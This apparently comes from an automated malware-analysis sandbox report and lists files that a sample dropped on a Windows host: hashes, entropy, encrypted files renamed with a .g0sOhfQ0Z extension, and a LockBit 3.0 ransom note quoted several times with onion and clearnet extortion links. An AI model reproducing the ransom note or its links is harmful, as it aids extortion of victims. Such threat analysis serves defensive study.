                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\BackgroundTransferApi\b8a02895-2df4-4599-b22d-89a2feff3662.up_meta.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):693
                Entropy (8bit):7.724499782721508
                Encrypted:false
                SSDEEP:12:CZLz1GWHMTGAIfaWRr+CEc63dzsHEHy5tkuWe+aIXvLD2VJNAWnM+i+9BVzd:CZLBgTGffa+N7KdlYtkEAD2HNAX+i+99
                MD5:168760C99E4E1945CC8EC1379F136E62
                SHA1:BCC47DF6D65ABD57DA9BD8CF5EB740ECC10C073C
                SHA-256:736F2D95257B0B63F28D8755C62388D9BC297FF266EB80ABBAD2452DE1567CE7
                SHA-512:280B88C546BCAADC66179DC658199C0554E6D92CAEF47076C64A187E629328995C98330F7397AFE826219A7947532BAD4B4DF3299D9D449B228A4A79F20E77C9
                Malicious:false
                Preview::.-.U.J.4........4n....O.....F<].U.d....%.:..gf..l&B.......}~5;..p.<.!<...a..4f:i.P...|t...)L..w...d..a.E.1.e..v7.<..(%..[.'....z..H....`76....x.E......{.-uF..U.....n...@....v)N|DM.u/u.K.K"..\u^)....{.....y...C>e./..L.....#2.?..Inw.o7..o...]V.)..6.j)..$.+.6..!..&..|J..3>..A...-U..P..z...,.=..O......|....M....M.>....*}.V......|[._.K.>.n!.@X.h....Q:`...Z ..Jg...b.l. CC....L'.H.1$.z.fE...^g.q-1...<....m.{..z.[j l...4I.$...W..J.[..G...J:..p.n.ZV...O.S*;.....(R.......cF{....!./.K.'~...}......].].lc2B..~..N#..G.hI....mI..K..DeQ.3...z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\BackgroundTransferApi\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):2621680
                Entropy (8bit):2.358638246503368
                Encrypted:false
                SSDEEP:12288:RdSjZN0nP95jdOGE8clta8fFbrtHbdtsGL5Nk:HUZN0nP9vTcPh98yNk
                MD5:6EDA9E645CFF90099D80504529C3E468
                SHA1:15538953F51DD47A145E0C613DA9FCC4FDE28B9F
                SHA-256:482C4A9476CFA9A915B15DBECDF1718DB724550DD86CF4A0A4D6A69CD0CDE7EB
                SHA-512:384B9DD208882E18C2EC29C33A6FD32A4AF00E821AFAB50A6E551B19F001707C5D38B0E4A382E007EA862CD825B00031A35910D6E461BDEC8A4EE6E6FE9A423E
                Malicious:false
                Preview:.......%..k..YG......EY........2.MD...34.....s...1t#...HU...]~...9...hB..%G.iC.IK..X..F...x!.'.%...qj....~._q....o.O.R.......".... .........q8...#...F...{US..%.3r.....X.....+........d4...F.....c....e|...3....#Z.%DXT&P.......C./_....:&..I._.\....._..@.Y.......~...V...'.nF6.7gPS..(...K..Q..g.a...E_.......jU'.Q:.......P9v..uT".<8.6.`._.s..q..=....^..&yl....m..1.p.B$/G.q.[Z.`I.|.F1...F.U}..Y...0......"u2.."S.2.........y..HR?dy.=.KO'..R.;.^.l.?....FK.KJ.B.......iz..'5W'S.-..bw.>X....'y.Zj.t.3.+...s.5.q.L/{..i...o...K.M<..E.TR....W}...n..t.WC...<.0ho.........Jmz+.5cL._._....3q...l.4..._0.......e..`....N.v..5....+.w(#...O.1....'.............4-.Cs.53..dYu...~..=o.[...z..v@:....#g.o..j..:.s...f8E... x65Pa..v.f.......P..;.?.I.'....g.n.........=....{.......9......P1....9..x...`.M.{..-.....h...g:.&..*..VP.)T......|nP.VX8.p......Z.>1;..3zk....$.....d..@.....|.@.....:.C.....l..ZL..u....zL%0.sz..........&\H=.....lV[x(.G ..O.U....(z.F..$.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.jfm.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):16627
                Entropy (8bit):7.98851882415189
                Encrypted:false
                SSDEEP:384:sRCzyNuqlhrKAujuJVyeYic/vW22JX3qvtaHfs3:GCzelsAujiVkX/OrHi
                MD5:31F48B8A3757ECD45ECBF6263BAE4896
                SHA1:61413D900805B5F8CE11539BB4A4AF361FB40185
                SHA-256:5458A9385CFEAE7E24C10451478689A445C7747AFD09E1491D3BBDCA16850BCD
                SHA-512:A8FE6A767B647CB8DFE6DCEB13B9F7A5CF7674706209D44C4C96EF0DFD65C9BF43E7317FB105CDDF23716F9AC821B3F275E77C08BC76D59995704C54AE099C79
                Malicious:false
                Preview:i..%LiK.Jp.]...7?.r.B.J...b~..P.t...Hd...Z(...V..........'!.g.2....+@..a..S....z5...}]...).3..]y....6...:1.k.d..1.;.....E.8...t..F...u..E}.Um1D.{..)........uwJ.w.._..x|...)...>..S...U...........4.d........_U.B.3#..?..a.(>.K...\..n......?-o...s.g.e1...To........Y.<e../.u..=..m......'.c.........-RW.F-G..l.(\...I.M....#..Q.#0.T~`.>7v.y./...h!M..U$..*7T.#}.x.....z.x..(..x.D....J....N,..}.[+g. ......x;.f.B.eE.V.1Ej..!."....9.....@wMw.)...t$....I...._..j..{9...w....y.R.....w.4"U...D...U2...k().i....&.Y."....h...]..N]...c.B78.....4...w?.p[..wQ..A....l{._7.tc..]%..qi......O.G.....J.h..i?..7.].u..}.K...Q....SEO..P!p~:T..N...{)xG....mJ.Zt.RXJ......*U.e....9..eZI.Q.......`Gr..oT*..HD...[.H......9H. Z....tt..M....o......<...s..AO..B.:d[;]P.b}qZ..x....~..g....#........\$..z\.1.#G..c..x.'.Z\.C.@3-'6.....F.b..c9.....y.U.....'......d..8..[<..gE....9H...3^.s.............|....,...F.=6Z...].x@h.b{..o{.3J.Io.....}l........7%{.?..#p..7L..%x92]Y.f(...d..nW.....~.M..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb.chk.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8425
                Entropy (8bit):7.978705802169033
                Encrypted:false
                SSDEEP:192:2gJTilr5mIwzydPXrwH1FJaNZahCB9gvlkZeK2fTcyo:2Ior5mIwWm/0uhF+MxS
                MD5:FF559A601A34E277AEB3DD88C09A5769
                SHA1:8BC898F11561B78FA0A69C4D48F6D7F142FDDAEE
                SHA-256:F5521B50732A05A46C70F6C20468FE8F445C6966917B3F9DDCEE3AC97648FCA3
                SHA-512:E74D17784D325370720923DEAFC3AE6B46995D0A3EF759F84D2641B4B6BFFAAAECB6988578A6656EF6DC40EC85F2A52A0147132D2B116560BB499B993AFF7333
                Malicious:false
                Preview:.q.VR....(.0......OLE...x.Iz9..'Qpa../.z|D..........k..EA7s..1.....WifG*|z...../...0Y.r...'3.....x/.q.b ..{...._*k..?+...........1.e..@{.EH..^.O..".i]..\Q.\..8.%.P....O.e....8.9<._..).>^.NE.isr...^n. .Chq5.....F...H...B]g =...B.a......Nw.Z]....=.Q.3o".s..VT.8..|S.S...u...Ya..Y......R.=.n\...(}3xM.^.....d(..J.M.....V..hl.....m..Z..a.%b.y...kk...Hg.k...R.w.b[K.Yi.VY@..0......8..O.{[.....4..I..*$.b...g@...K....f...,..7\..pA(.B`&......H......1BK...V......6......Cd.~.L..x..d.~2..?..`.....#U.*;.....L!.C.......W#.Cx[.0..E2G.5..+.w..a.... .~.kW%.&#oV..Sv."...|K(./)..J^Lyd.].....o..,$.....I.....-.].L.t..d..3...e.T.&...W...&F.~.Y...=h...j0E.YL.%i..CF.Bv...7....H.f.s+%s.)..n.X.....M...)..v....-k.W.oD....O.....m../2.........$;c....=_.b....@.4=..2..o!S=a....d.......`.X.D....0..Z..;...-&.>2S.V.c.Z1!#B.<..<7...B%.a.R... .....4..[{Pj.7."v.:.b.......R......v1O.-+....c.V."...#.*.}\.~,A..,%5^w...).I.L.5....U.......o..7..%H...2.f.&Z!.Y.6,..r.c.z...=H}.K.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb.log.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):524521
                Entropy (8bit):7.999600249583094
                Encrypted:true
                SSDEEP:12288:X4cMxk/ejrV3EfqI9cTrpNgwGoQlKJjjV0GQd1oab+Wn:X4cwjxEfl9cT1Ng9oiKJjj6GwbBn
                MD5:73F1EDF13E5D6782FD18EC112D99FD58
                SHA1:7D460229C1927885C27BE67947A45EA5C50F6F2E
                SHA-256:BB6A9BCAB885F0E390BF8830E06D397FE63555E73833F90D34FCF2914FA8C1DC
                SHA-512:5F2FBA3B73D364415D1D36EC8CA85BBF9B2C88B90517ADE3F43AE9B24A75A06B6D8BF0B5233F8BC6D1B57027536712D290B2E557796CD6A693C6AD14E5DE2AB2
                Malicious:true
                Preview:......z.).5..;..i........6J.....p8........tT4&....P.!.~........>O..8b,L....l)......D......z...h....<E..$.AE7.*...Z.A.a.FG...G.....o...........g.F*..q....c..i>..1.... .K.f ..n..U.E.e..O.m...$.t...O....9..Rm...4z..k.m.-....`...].....z...4Q._.~..*.k.g.,*.U..%...K.W.?.\../tb.+.3N.I8..SQ.Zh..m.GS.(./cq...v(.o.S{....@D..I.._.d...^...?.8a9...cQ-T._.4.)....W ._....+C0....C.9.V......K^..G....^..l[.....N}..O>...>..Jp..I*.<;.V.ll2..n.q..;V.Q?r.%.L.'0X....2...a.. {r5.t!....T.5..b.s.G._?V~p9h.H...........7..}....[.V.....Y.!..g....i.)...D.C1.?.....w..>>.a..d.....+I. ........A......7../....P..&.....I..1..A.....H.....$....%}.m?.......M....x...S..6v...B.W...(.#........<......s..........x....}(....s...uZ...,...b..i..39.QD.d..V..M...&".-.8N....N-!.lo.....pp1..y......... ...l}....LM..Q.I.$.;.o]^.8....xUb(y.@:v...\.........7H.). ......HQ...... ."N....'s....M...6..HO..?2.@.n..;23......s.>.?.4`...V._....-E2..D.!.....0...Kf.._k..9.....F.^7..O.....'.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb00001.log.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):524526
                Entropy (8bit):7.999680696681113
                Encrypted:true
                SSDEEP:12288:nyIRyu/VPFhDUZKA0c/sZxDBk6At9p3wdt0xdNToCQlFPGT4J7c:yXu/VdWKA0c/sZxDBk6q3wd+xdNbQlFe
                MD5:BDA4EF9DC9BE7E9D1E79BAC0755A98A4
                SHA1:0BD05A6DD993E32A035D27D5803BF474E8D711E6
                SHA-256:EF8CE20329D7571F15C31EEFD580513637E0F2A68F5C27179CFB45DFF8CFFBBD
                SHA-512:22376B1A66E8146E717DCDB771C211EC4A7B1FFC039EC0C95ED75A2EFAEE4160AF81E690423D5DD6831F80A5317677F6762E72CBB2924D85792621813464EAE4
                Malicious:true
                Preview:..S...Eg>+..u.b{d}."D0.u-..I..>.+I..7q{......M.&.fN....H.. ...El..,...2........JE.^.......~.....cB.>..U..U..=.b........y..\...]x=t==..x.t;........}..o...>...?W(e..*...8J/b.3..N..\.#.V...FZ.iJB.....1el(aByj.....=?.v.s.<........<...~./0.......B?.....9.)o..d..h8.BF{aL..im.P.........).....=..."M.9...z.......VDM....Y..uB.`8.p09..|C"M....{B...6.L.;$TddF@^.B....<..$..'.'..[.....:,.T..o..D...v.sC..s.+...#......!..8jH..0T.qBw...je`..-....?...;.=.Q..\...u..n+s.......n.$.@..`.$k..VP};.}.egZ.......?......+Kq.(.O.lI_.>;...b..8...msBy..l.q..!..>MO..AG\7...;gg..^..0...`..I..."s....|z..4............+..\.d.n.*}...#...n7.j)!9.gY.}~^.W}..A.K...J.$t!.........8.....?#...PMd>d..q...5%.(...d-.YBF.....x.t.T]..N...2....c=.!.9|.Bk..p.;...... l.r..V........5........('8QV.|.....ny\..^.N`../...f...nd.=....P.0..#....6{z..Kg-.(..|BoA..|.J.>*. vFc.nu.>.....9..;..z.......NqR..u.[........NL8..Z1.'^..t.5....].I...'.e.NX........C.7.P.~...E..?.u.*Tc...,....?..q.[. ....qs......

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbres00001.jrs.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):524529
                Entropy (8bit):7.999608864116478
                Encrypted:true
                SSDEEP:12288:pIOr9Nh8xpSlCbX+CP3M8eYqk9pMTKWfo4l:pfZmpSIbXtk8eYqkHMTb/l
                MD5:B4DD1E4A3427F59DD529C79BB4286679
                SHA1:4D528915A0821B0927523E77FA2F9FD0EC2C1D88
                SHA-256:95E89B9D9528D8F1B963D2D6F2A94F83A1EF552D9943EEF1AAC1F777382D86E4
                SHA-512:8E4B35FFB853FA9A4804535D5118D2C709C0E0384EF9240E3962F896A9F916D0B9AD24BDB83DBF988ED1E5BFF7D9810682F225CEB8DD4FED37AA91A20D131EC4
                Malicious:true
                Preview:.iSTt...,.%......'V.A..@...4.v..}........r~X]h...r.L........?...n.uu...J...u...|g.^...rZ.....B~D....+)..<N.$.^..-Z.NZ/..t....../kp..?T..#F..H........7.+....[.N...............j7...el.PT...T...... i.....C.*y>m....Mb..B..T..)2......).5..W..B*...i...:`......0.[.d6'66H.fjmq.....f@.i.,......9}...D....6]. .o....:.`...`..x.G.)..2Q..;..?.G..A.X.q...+cQX...3..:V.!.xX).*....C....Y-T....K..6....bI.ig.:.P.tl........1.K4vb.2w#.o....O..=...u.k.p=.6?...t.XE..J.....FQ.T....8u[.8$..(..`.`..E....#..=..e...|..;...............5...".?..T. ....v...T1......<...q.o3.m..}.N.....wmL..]^..........#r...TA@".1.k.......+..lxu2.../.q9E.e.Q.*O*.J.?,..9...P:.{.......E.V..B...Ej.0.....1....I/.T..E.V]..J.r. yz.u.uay.R.?.....|1.W._.x.0...C\..X7.E*...)...d3K..q..-......n..a.O..}..h.*0.=...k_.......\F*<......\../...3...T....y4.........uS.&.S.....,...\.x............2.....:.A...|.}....N..,y.......G....'..*.j.5....IE`Z.....iAW.9.Y.+.A...VB.\...._<.@6d..0...F..>%..~^.4

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbres00002.jrs.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):524529
                Entropy (8bit):7.999639760636043
                Encrypted:true
                SSDEEP:12288:0aUTpyoA7xZdhItft0lNVwzNiV7fIXv0Dc7tlfbj2BP:0aC4PZi0l3w5iV7Sv0gjfby9
                MD5:66E5721BB9DE5D9557E456922433E87A
                SHA1:37AD52D09FEC60C43A8FF9812902611CCF789EF9
                SHA-256:44E7EC5C2B721CBE34CA7F174ADA8C45531FB3B904C0C8C1392D43C9DFE45D0D
                SHA-512:CBAD0150342987CF4C952DC5341747510E90BECEFAB1BEEE283957BE3A7143CFC4E2A485E9308F09A267D353243DA59A28BDD6436593C69306FEDD1AC628B850
                Malicious:true
                Preview:6.m~.FQE.....p. K...Q.6.w.\.e.[..,b.E.^.^.]..&@.]p.........ZBB..|}%.N.0...!.....e:..li|$..X.#.6-.A.O.......T:...H.:....gD.7N....E...l.mQ.;.k.......]..-..i....|...S..Q.,.^..4..8.....x.j...............sy.t............H.,..T...q...8O.#:X.$.0/....=.....B....Px,:.v.X4u....g./.}.A.1..I'.v.s.. ..,e.8u..o....xY...m...J....5...Df.......8.Nz.6..I....e&j-...yP.....U.....c#....)..<.0...s~.{..6..r..o..(.]..i._.a..m..i../.."g.....F....Vc..o@.R..b..M...g.@.~........."R1..k.jc...0......Z..l+..zw.C+..d..E..........Xn.U..]............an.@.A2..*..E.{...7.N...]...P.{v&...F......AL@F...b...Th...m.g....)E;........L......a....:..x.OR....0.....I..:......8x.y<...xN...#iD:&......k....i{..F..26[.m.J..\.. #.q.SK.e@0>/.!....Q"H...QL.G...).8Q.".(z.(.....G..j....K.h..]...[R...0 ...2l..0.....XRw....%]...0.X.q...k.x.....v....~.4.....%+o22.....)...8.<....8.[a.....>.m..Ka_R.].z..+@...OQK,z..v..U.9R.-.4.#CX{...-.q2.d.@.;.....J.....,V.."h..].6.~.g..9..5.L.S..[d.....

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbtmp.log.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):524527
                Entropy (8bit):7.999637642406899
                Encrypted:true
                SSDEEP:12288:W879YUaOS0RLYIFRfgDP9MWUIdQrnOsIkM8/8mm5AeK2F:W879YUtS0RL3FRf8PSW+j/8mm5A8
                MD5:7F7A62085DA2E67D1944381ADE8F897D
                SHA1:65888D52EE1D51EC563029B9F385EC29A8FDAC74
                SHA-256:9228055EF41D5DA7C68897DED128CF1E895A953B3085CF1E855F1FB86ED3AB32
                SHA-512:630DCC8D461783D5740269A856C7679783D9EF3BA49D81C0B97E64D97993D54F767F6088A7D8479CB4EF1A728D129B6864BECBD7389183FC61B1F1F651384028
                Malicious:true
                Preview:.2.....p.D....f&..F.A...1.E;..A;.jED.....Ar.$..N..Dgenq...9....I9.bDq...#nu.f..|MJ.OJR.?..6Am#z....%..`......n^Xs..'?..cH..0E.]$....X...w..s..+..^p>A.X!..s.Z.B..H...A.. ..rxcK...P=..+tz.f.,?..Dm1.I.`j...d..!...~h...\.g.4....J.E3......_+..3..|vAft..{......5.......<&./b.....}..[..5....>b...%.$O.......kL.H..>Q;.7W.....dz..?6.i6"..S..e........M..X..hd.i.P.\G...-r.[..yLF*.q......`....pK..s.x.EIU._...`..._I.\.g.....&Tac..$..W..>.....!......TDrd.Z..?...+.1...Gy`..'.B.....K*....1.m.:`w$V...Du ...:.....#C.e....U.$.........m|...JJ.....R.m.N...{"6...;.T.p.AlS.7........5.3..X...........:.... .#.......V`....N..T.-'....*0^...;.....0mZ.x<k.s4..MK...KC&.l..r.xX.N.&.?sN...T..b..&.....q..^.V..0..(6xS.Q{T.w.~.L...(..U.5.].....l...q..O.......D.WP...K..r^s'%....F.....89U.e}.n..&f3.[f.....8.......~.zr.. .|..+o.5}.......0~...#X....~.]h...{.......{&"ip....,O#iz..@.2.B9s.. U....`...y...8N_.....MH1.-...YI..{.j2.....jc.p.l....c.....s...-.e..c.m.;.....s%Y..J.?n

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Chrome.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4477
                Entropy (8bit):7.957371469387029
                Encrypted:false
